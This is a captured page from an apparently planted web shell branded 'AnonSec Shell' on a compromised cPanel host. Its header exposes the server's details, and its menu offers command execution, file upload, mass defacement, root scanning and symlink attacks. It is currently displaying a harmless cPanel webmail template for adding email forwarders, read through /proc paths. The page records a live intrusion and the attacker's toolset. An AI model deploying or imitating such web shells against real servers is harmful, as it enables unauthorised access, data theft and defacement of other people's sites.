AnonSec Shell
Server IP : 104.21.37.246  /  Your IP : 172.71.28.146   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/2388322/root/proc/2388321/cwd/webmail/jupiter/mail/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /proc/2388322/root/proc/2388321/cwd/webmail/jupiter/mail/doaddfwd.html.tt
[%
SET CPANEL.CPVAR.dprefix = "../";
SET email_add_forward = execute("Email", "add_forwarder", {
    "domain" => RAW_FORM.item("domain"),
    "email" => RAW_FORM.item("email"),
    "fwdopt" => RAW_FORM.item("fwdopt"),
    "failmsgs" => RAW_FORM.item("failmsgs"),
    "pipefwd" => RAW_FORM.item("pipefwd"),
    "fwdemail" => RAW_FORM.item("fwdemail"),
    "fwdsystem" => RAW_FORM.item("fwdsystem")
});
%]

[% WRAPPER '_assets/master.html.tt'
    app_key = 'forwarders'
 -%]

<div class="body-content">
    <div class="section">
        <p>
            [% IF email_add_forward.status %]
                [% FOREACH hashref IN email_add_forward.data %]
                    <div id="fwdSuccess" class="alert alert-success">
                        <span id="fwdSuccessImg" class="glyphicon glyphicon-ok-sign"></span>
                        <div id="fwdSuccessMsg" class="alert-message">
                            [% locale.maketext("All email sent to ”[_1]” will now be copied to “[_2]”.", hashref.email.html(), hashref.forward.html())%]
                        </div>
                    </div>
                [% END %]
            [% ELSE %]
                [% FOREACH error IN email_add_forward.errors %]
                    <div id="fwdCperror" class="alert alert-danger">
                        <span id="fwdCperrorImg" class="glyphicon glyphicon-remove-sign"></span>
                        <div id="fwdCperrorMsg" class="alert-message">
                            [% locale.maketext("The system could not add the forwarder: [_1]", error.html()) %]
                        </div>
                    </div>
                [% END %]
            [% END %]
        </p>
    </div>

    [% IF (ExpVar.expand('$appname') == "webmail") %]
        [% INCLUDE _assets/return_link.html.tt return_location='../index.html' return_link_text=locale.maketext('Go Back') %]
    [% ELSE %]
        [% INCLUDE _assets/return_link.html.tt return_location='fwds.html' return_link_text=locale.maketext('Go Back') %]
    [% END %]

</div>

[% END %]

Anon7 - 2022
AnonSec Team